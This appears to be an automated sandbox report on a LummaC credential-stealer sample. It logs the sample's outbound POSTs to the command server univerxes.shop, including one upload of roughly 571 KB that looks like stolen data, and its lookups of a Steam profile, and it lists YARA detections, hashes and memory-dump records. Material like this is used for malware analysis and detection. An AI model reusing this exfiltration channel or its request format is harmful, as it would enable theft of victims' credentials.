Data Ascii: t%z#^eP+h@$Z1*x/M0btGZ~n8UQSqu3PT$(=36c]SnYa3KMEXKP]1CW3/yc6om/<V~I/ !/xi Tqrfw_;!A?2_f%~M8
2025-03-11 16:29:10 UTC | 1369 bytes | IN | Data Raw: be 93 07 c4 bf 31 86 40 79 dd 6d df 09 ce f0 36 7f 10 22 4a 55 0a 62 bc e6 c2 8e ff 44 69 5e 6a b5 d6 f0 0e 77 be 5f 8d 46 a6 87 d5 fd a0 f9 d9 03 26 c1 eb 63 31 f9 e4 ff 14 26 80 97 33 76 ae 99 35 a9 bb 98 c9 77 16 1f 71 b3 4d 03 26 89 03 3b 18 66 3f d0 a7 f9 22 70 2e b2 ab 49 56 ec f3 b7 fc d7 12 1c c4 eb b4 d1 b2 d7 09 01 63 bf 8f 10 39 cf 4c 4b dc 92 03 92 ef 02 4a eb e3 9a 37 d3 e2 c2 28 c2 69 fb e4 60 f1 1f 69 60 09 8b 05 e0 cd 65 45 f2 ce 36 6c 16 7f 90 cd 11 27 b4 8e ac 07 8c 52 ae 2b 39 28 d2 db 3f 75 18 9b 4c fd 4d 0f 0f 7a 01 f0 ff 5e 28 e7 72 0e 40 a6 0e d2 b7 71 c8 c9 a8 81 4f 1d cc 41 84 3d e6 a3 06 94 de 65 1f 5e 08 52 df b9 5e 03 91 f8 cb 5d 29 c7 f2 85 c1 a6 01 23 63 eb 1f 94 ee 54 b3 c7 3c 50 ec 59 6e 0b 0d f3 d8 d1 38 2e ca df 28 ef 23
Data Ascii: 1@ym6"JUbDi^jw_F&c1&3v5wqM&;f?"p.IVc9LKJ7(i`i`eE6l'R+9(?uLMz^(r@qOA=e^R^])#cT<PYn8.(#
2025-03-11 16:29:10 UTC | 1369 bytes | IN | Data Raw: b0 99 6d 56 3d 89 49 49 ec 93 e4 4b 09 ba 75 16 f1 37 e1 87 0a 36 15 96 61 8b d3 97 9d 88 ae 48 29 de c1 0c b6 c7 8c df 03 19 2a f7 b5 d8 ef 3c 05 db fc c7 93 35 92 06 25 34 2a 7b 02 f2 6b 37 d2 6a 8d 6d cc 4f a4 22 87 ac 8a bb 27 a8 85 f5 47 eb 3d 72 7f 82 31 a5 29 97 b6 15 a3 59 c0 7f b6 15 1b 6b 66 4a 15 3b d8 ab 58 b9 9a 83 a0 20 19 68 86 66 db 0f 4a e5 80 69 6d 7b c7 df 0c d9 71 64 8b 31 23 ea 41 92 38 38 a1 c8 44 9c 43 0c c6 5f ef 77 2e 2a b7 53 3b f6 e6 cd 8f 99 93 8d 5c 15 0e 82 56 49 3b 36 72 db 5e f2 9e 24 fc 41 88 8d f9 5d c0 1a d2 62 7c c6 4c a7 ef 0d 1a bf 55 c7 09 f8 53 87 99 76 d4 b1 e9 8a 40 d9 45 c9 0e 43 48 67 62 03 fd bf c2 e9 88 77 93 5f a4 ba 86 ce 74 60 83 b0 0d 84 c0 c3 be 0f 0d 46 34 0a 36 a2 84 7d e4 08 b2 90 e6 97 35 75 2e 61 13
Data Ascii: mV=IIKu76aH)*<5%4*{k7jmO"'G=r1)YkfJ;X hfJim{qd1#A88DC_w.*S;\VI;6r^$A]b|LUSv@ECHgbw_t`F46}5u.a
2025-03-11 16:29:10 UTC | 1369 bytes | IN | Data Raw: b4 3d 82 66 3f c6 81 aa 08 2c 80 78 47 bc d5 11 4e d1 f8 65 d5 2d ba 8c b5 c8 ab 67 e2 87 30 9e b1 2c ff a2 f2 65 e9 b9 a6 4f 10 d0 18 bd b4 4d 33 ff 24 fe 02 8e fc a8 21 db 5a d2 d4 85 35 8f bd d2 35 de b1 b6 45 da 6c 17 58 55 e8 4e 6e f7 1d e1 e4 ea 98 c7 bf c9 9f 87 9c d9 ee d6 2a 57 5b a9 db 84 4f 22 e2 ba 19 7d 3a fd ec 87 f5 b7 de 49 51 22 3b c0 32 de 36 b2 f6 35 8f e5 37 9e 7e 35 48 50 72 b7 85 ac dd 1e f0 6d f8 49 29 03 4c f7 29 ab 45 25 4a f1 b7 79 3a 8f 57 cb 5a 4f 5a ae 96 f9 c5 54 89 a0 17 71 3f a1 d0 e8 2c b5 bc af 90 82 6c 11 18 4f fc d0 e4 d2 9c 99 11 6a e8 50 55 33 ca 52 7e 5f f7 66 af bb dd 86 ce 96 29 d6 98 6a 76 34 3f a3 77 a3 93 0a 38 96 cd 12 3e dd 6e 27 20 5c 0f 45 81 c8 5b 57 09 29 69 83 49 b6 37 6c 27 d7 a5 ef 6d 0f 80 59 5f 5e 25
Data Ascii: =f?,xGNe-g0,eOM3$!Z55ElXUNn*W[O"}:IQ";2657~5HPrmI)L)E%Jy:WZOZTq?,lOjPU3R~_f)jv4?w8>n' \E[W)iI7l'mY_^%


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49711 | 172.67.213.171 | 443 | 8332 | C:\Users\user\Desktop\biyhoksefdad.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-11 16:29:14 UTC | 278 bytes | OUT | POST /SwnNW HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=75lRdx7wLp1tS9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 14917
Host: univerxes.shop
2025-03-11 16:29:14 UTC | 14917 bytes | OUT | Data Raw: 2d 2d 37 35 6c 52 64 78 37 77 4c 70 31 74 53 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 66 32 37 34 65 33 39 64 38 65 39 61 33 61 61 63 39 64 36 30 38 33 38 31 62 30 39 37 30 30 31 64 61 33 39 61 38 39 66 38 36 39 64 36 64 35 32 65 63 66 37 32 32 65 32 32 0d 0a 2d 2d 37 35 6c 52 64 78 37 77 4c 70 31 74 53 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 35 6c 52 64 78 37 77 4c 70 31 74 53 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45
Data Ascii: --75lRdx7wLp1tS9Content-Disposition: form-data; name="uid"f274e39d8e9a3aac9d608381b097001da39a89f869d6d52ecf722e22--75lRdx7wLp1tS9Content-Disposition: form-data; name="pid"2--75lRdx7wLp1tS9Content-Disposition: form-data; name="hwid"E
2025-03-11 16:29:15 UTC | 819 bytes | IN | HTTP/1.1 200 OK
Date: Tue, 11 Mar 2025 16:29:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DUTh9rgnUyg%2Frc49bVU4ZOGY%2FVA2aQLPaYuqZG5STLPzE%2Ff2imi7AT4KtZlmXFljva71yGrobiul3nlGIOEODfnIPvwmsQkV96qctJ59BwwXZ8JapDcq8jPRUC2yZ%2BwNMw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91ec6df7da6761c0-ORD
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=51903&min_rtt=51894&rtt_var=14611&sent=7&recv=17&lost=0&retrans=0&sent_bytes=2833&recv_bytes=15853&delivery_rate=55760&cwnd=32&unsent_bytes=0&cid=311500d8c6cce71a&ts=1255&x=0"
2025-03-11 16:29:15 UTC | 75 bytes | IN | Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 36 2e 32 34 32 2e 31 36 36 2e 32 38 22 7d 7d 0d 0a
Data Ascii: 45{"success":{"message":"message success delivery from 76.242.166.28"}}
2025-03-11 16:29:15 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        3192.168.2.549712172.67.213.1714438332C:\Users\user\Desktop\biyhoksefdad.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-03-11 16:29:18 UTC273OUTPOST /SwnNW HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=fI28nppP3
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Length: 15041
                                                                                                                                                                                                        Host: univerxes.shop
                                                                                                                                                                                                        2025-03-11 16:29:18 UTC15041OUTData Raw: 2d 2d 66 49 32 38 6e 70 70 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 66 32 37 34 65 33 39 64 38 65 39 61 33 61 61 63 39 64 36 30 38 33 38 31 62 30 39 37 30 30 31 64 61 33 39 61 38 39 66 38 36 39 64 36 64 35 32 65 63 66 37 32 32 65 32 32 0d 0a 2d 2d 66 49 32 38 6e 70 70 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 66 49 32 38 6e 70 70 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 32 38 44 44 34 30 41 36 38 43 44 44 35 35
                                                                                                                                                                                                        Data Ascii: --fI28nppP3Content-Disposition: form-data; name="uid"f274e39d8e9a3aac9d608381b097001da39a89f869d6d52ecf722e22--fI28nppP3Content-Disposition: form-data; name="pid"2--fI28nppP3Content-Disposition: form-data; name="hwid"E028DD40A68CDD55
2025-03-11 16:29:19 UTC | 820 | IN | HTTP/1.1 200 OK
    Date: Tue, 11 Mar 2025 16:29:18 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rZ03co6%2Ftw2Xm6tLaOcQtp5YyXYRBxzfFYqvkin1ozkEW6Cya%2F0tTcbUeiVnUB1DTNorxtPojcPfVuouFEOzmDZ2uMPs%2B1lwOT72rB1gk%2B65Kf9wM0MD2h9Re4X9vFAwDw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 91ec6e0e5c7609fe-MIA
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=25505&min_rtt=24844&rtt_var=8133&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2832&recv_bytes=15972&delivery_rate=104669&cwnd=205&unsent_bytes=0&cid=7d31b419603a762e&ts=1049&x=0"
2025-03-11 16:29:19 UTC | 75 | IN | Data (hex dump omitted)
    Data Ascii: 45{"success":{"message":"message success delivery from 76.242.166.28"}}


Session ID: 4
Source IP: 192.168.2.5 | Source Port: 49713
Destination IP: 172.67.213.171 | Destination Port: 443
PID: 8332 | Process: C:\Users\user\Desktop\biyhoksefdad.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-11 16:29:22 UTC | 276 | OUT | POST /SwnNW HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=q2478UI0qTxb
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20545
    Host: univerxes.shop
2025-03-11 16:29:22 UTC | 15331 | OUT | Data (hex dump omitted)
    Data Ascii: --q2478UI0qTxbContent-Disposition: form-data; name="uid"f274e39d8e9a3aac9d608381b097001da39a89f869d6d52ecf722e22--q2478UI0qTxbContent-Disposition: form-data; name="pid"3--q2478UI0qTxbContent-Disposition: form-data; name="hwid"E028DD4
2025-03-11 16:29:22 UTC | 5214 | OUT | Data (binary multipart body; hex dump and ASCII rendering omitted)
2025-03-11 16:29:23 UTC | 814 | IN | HTTP/1.1 200 OK
    Date: Tue, 11 Mar 2025 16:29:23 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qg0FNHKDmheKxN4OgryuZzjIRh5aanE0Qr90pHd7RoilpzYAjAKmOX189moUWtydev0ff2dyorsN6bUSXl658GXEgAUculKQMiRbL4zFefKaQKFVAMd2v1%2FLE6doSzRW1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 91ec6e27f855c3f5-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=40469&min_rtt=39823&rtt_var=12321&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2833&recv_bytes=21501&delivery_rate=68005&cwnd=32&unsent_bytes=0&cid=9f9550c2a2a6b4f8&ts=1054&x=0"
2025-03-11 16:29:23 UTC | 75 | IN | Data (hex dump omitted)
    Data Ascii: 45{"success":{"message":"message success delivery from 76.242.166.28"}}
2025-03-11 16:29:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 5
Source IP: 192.168.2.5 | Source Port: 49715
Destination IP: 172.67.213.171 | Destination Port: 443
PID: 8332 | Process: C:\Users\user\Desktop\biyhoksefdad.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-11 16:29:27 UTC | 276 | OUT | POST /SwnNW HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=Q73r4i0A0ZxSZ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 2473
    Host: univerxes.shop
2025-03-11 16:29:27 UTC | 2473 | OUT | Data (hex dump omitted)
    Data Ascii: --Q73r4i0A0ZxSZContent-Disposition: form-data; name="uid"f274e39d8e9a3aac9d608381b097001da39a89f869d6d52ecf722e22--Q73r4i0A0ZxSZContent-Disposition: form-data; name="pid"1--Q73r4i0A0ZxSZContent-Disposition: form-data; name="hwid"E028
2025-03-11 16:29:28 UTC | 819 | IN | HTTP/1.1 200 OK
    Date: Tue, 11 Mar 2025 16:29:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vkFWNYxJ%2B8OesRW7VAUaXvkgVeOy3vHiMFGG7%2FtZq7lYGa66w0yxgLPhysUpZBHGFZudzsJt%2BtiDeUgMITdTYQwL2k%2FzWxt85xkRPEr0GMaKQZeyZtDuJaZcUYW%2B18DFpw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 91ec6e482c166215-ORD
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=51611&min_rtt=50362&rtt_var=15283&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2832&recv_bytes=3385&delivery_rate=57494&cwnd=32&unsent_bytes=0&cid=22fd825dc24919e9&ts=1199&x=0"
2025-03-11 16:29:28 UTC | 75 | IN | Data (hex dump omitted)
    Data Ascii: 45{"success":{"message":"message success delivery from 76.242.166.28"}}


Session ID: 6
Source IP: 192.168.2.5 | Source Port: 49716
Destination IP: 172.67.213.171 | Destination Port: 443
PID: 8332 | Process: C:\Users\user\Desktop\biyhoksefdad.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-11 16:29:31 UTC | 282 | OUT | POST /SwnNW HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=4A9KU35TST2zC59CJ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 571127
    Host: univerxes.shop
2025-03-11 16:29:31 UTC | 15331 | OUT | Data (hex dump omitted)
    Data Ascii: --4A9KU35TST2zC59CJContent-Disposition: form-data; name="uid"f274e39d8e9a3aac9d608381b097001da39a89f869d6d52ecf722e22--4A9KU35TST2zC59CJContent-Disposition: form-data; name="pid"1--4A9KU35TST2zC59CJContent-Disposition: form-data; name="h
2025-03-11 16:29:31 UTC | 15331 | OUT | Data: 9 further chunks of 15331 bytes each (binary multipart body; hex dumps and ASCII renderings omitted)
                                                                                                                                                                                                        Data Ascii: y5_o3:9t1d2Zpvic?I!xP e*KNlN45^H/qX/E,[wsazc7\lLKEoV5a<,gwo#gQxsPIp<`V9(3,K7{MQ`niP8`#%Q=aXJ&)l
2025-03-11 16:29:33 UTC  272 bytes  IN
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2025 16:29:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Server: cloudflare
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
CF-RAY: 91ec6e5eaf3a6210-ORD
alt-svc: h3=":443"; ma=86400


Session ID: 7
Source IP: 192.168.2.5
Source Port: 49720
Destination IP: 104.73.234.102
Destination Port: 443
PID: 8332
Process: C:\Users\user\Desktop\biyhoksefdad.exe

Timestamp / Bytes transferred / Direction / Data
2025-03-11 16:29:37 UTC  94 bytes  OUT
GET /profiles/76561199822375128 HTTP/1.1
Connection: Keep-Alive
Host: steamcommunity.com
2025-03-11 16:29:38 UTC  1974 bytes  IN
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Tue, 11 Mar 2025 16:29:38 GMT
Content-Length: 26508
Connection: close
Set-Cookie: sessionid=64a000a78c4b001a9e97dc25; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7Cdf4d9cf365335b2c152b7982a59e4c1e; path=/; secure; HttpOnly; SameSite=None
2025-03-11 16:29:38 UTC  14410 bytes  IN
Data (ASCII): <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-11 16:29:38 UTC  12098 bytes  IN
Data (ASCII): k" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">


Session ID: 8
Source IP: 192.168.2.5
Source Port: 49722
Destination IP: 104.73.234.102
Destination Port: 443
PID: 8332
Process: C:\Users\user\Desktop\biyhoksefdad.exe

Timestamp / Bytes transferred / Direction / Data
2025-03-11 16:29:41 UTC  94 bytes  OUT
GET /profiles/76561199822375128 HTTP/1.1
Connection: Keep-Alive
Host: steamcommunity.com
2025-03-11 16:29:41 UTC  1974 bytes  IN
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Tue, 11 Mar 2025 16:29:41 GMT
Content-Length: 26508
Connection: close
Set-Cookie: sessionid=67aa18c404e8cbddfae059fa; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7Cdf4d9cf365335b2c152b7982a59e4c1e; path=/; secure; HttpOnly; SameSite=None
2025-03-11 16:29:41 UTC  14410 bytes  IN
Data (ASCII): <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-11 16:29:41 UTC  12098 bytes  IN
Data (ASCII): k" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">


Target ID: 0
Start time: 12:29:01
Start date: 11/03/2025
Path: C:\Users\user\Desktop\biyhoksefdad.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\biyhoksefdad.exe"
Imagebase: 0xa80000
File size: 1'312'768 bytes
MD5 hash: 67AF8A00ABA060D6508DF2389989D85D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1541986119.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1541835345.0000000000FC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Memory Dump Source
• Source File: 00000000.00000003.1627352228.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FC9000, based on PE: false
• Associated: 00000000.00000003.1578141492.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_fc7000_biyhoksefdad.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5f28fa0c0bdded267792985f5f09234f7fcaaa56c7868372213256238de354d7
• Instruction ID: c6457e475ab7e4d553f92c0f5ba72cdaba7ad354718e2388ff4636366425e04b
• Opcode Fuzzy Hash: 5f28fa0c0bdded267792985f5f09234f7fcaaa56c7868372213256238de354d7
• Instruction Fuzzy Hash: 96D1585585E7C45FD7239B704CA0AA97FB6AE03264B1E41C7D4E1CF2A3C1499D0AE327

Memory Dump Source
• Source File: 00000000.00000003.1627783526.0000000000FF5000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FF5000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_ff5000_biyhoksefdad.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a9b0d3c5350bae6b4368c7f01934d392ff82f7f49da8acb1386df464fae7040c
• Instruction ID: 8e721babeea3c773be6bdd04cb6248ac0802942a074a5d801e3ecaabe8f5a5eb
• Opcode Fuzzy Hash: a9b0d3c5350bae6b4368c7f01934d392ff82f7f49da8acb1386df464fae7040c
• Instruction Fuzzy Hash: 5AB1A4A284E3C25FE7038B748C252917FB0AE13258B1E45DBC4D4DF4B3E2891C5AD762

Memory Dump Source
• Source File: 00000000.00000003.1627470793.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FB1000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_fb1000_biyhoksefdad.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 14b5bce15dbd82687e6c2f8f273bde8a4a7791e674882ae09754663620918a5c
                                                                                                                                                                                                          • Instruction ID: 445b65aa0566697909fac15ae44483339c0163532ba0d1c4f7137fa04817a287
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14b5bce15dbd82687e6c2f8f273bde8a4a7791e674882ae09754663620918a5c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49E1AC5144E3C11FDB178BB10DB9591BFB0AD2721071E86DFC8DA8F8A3D249980AE767
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000003.1627470793.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FB3000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_fb1000_biyhoksefdad.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 14b5bce15dbd82687e6c2f8f273bde8a4a7791e674882ae09754663620918a5c
                                                                                                                                                                                                          • Instruction ID: 445b65aa0566697909fac15ae44483339c0163532ba0d1c4f7137fa04817a287
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14b5bce15dbd82687e6c2f8f273bde8a4a7791e674882ae09754663620918a5c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49E1AC5144E3C11FDB178BB10DB9591BFB0AD2721071E86DFC8DA8F8A3D249980AE767
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000003.1627470793.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FA3000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_fa3000_biyhoksefdad.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 11febeacde7669ff088f9f863df4787df2410adcd35d05977de99a6fbb0dab7d
                                                                                                                                                                                                          • Instruction ID: 5a56bc61c452846370ef5dac656ac267ebcd2730d5683355bab8fa4aac87ff20
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11febeacde7669ff088f9f863df4787df2410adcd35d05977de99a6fbb0dab7d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 947146A244E3C14FDB178B708D6A5517FB1AD1322431E86DFC4C68F4B3D359880AE7A6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000003.1627470793.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FA3000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_fa3000_biyhoksefdad.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: f8ea6655332b13ecb48c28b22838454ebf3383790405bb39110ed7f0ea888528
                                                                                                                                                                                                          • Instruction ID: 8e71f19fd844af5a526df7d74a4293ebc0f9a5e54614375e909055ddfd6bbcfd
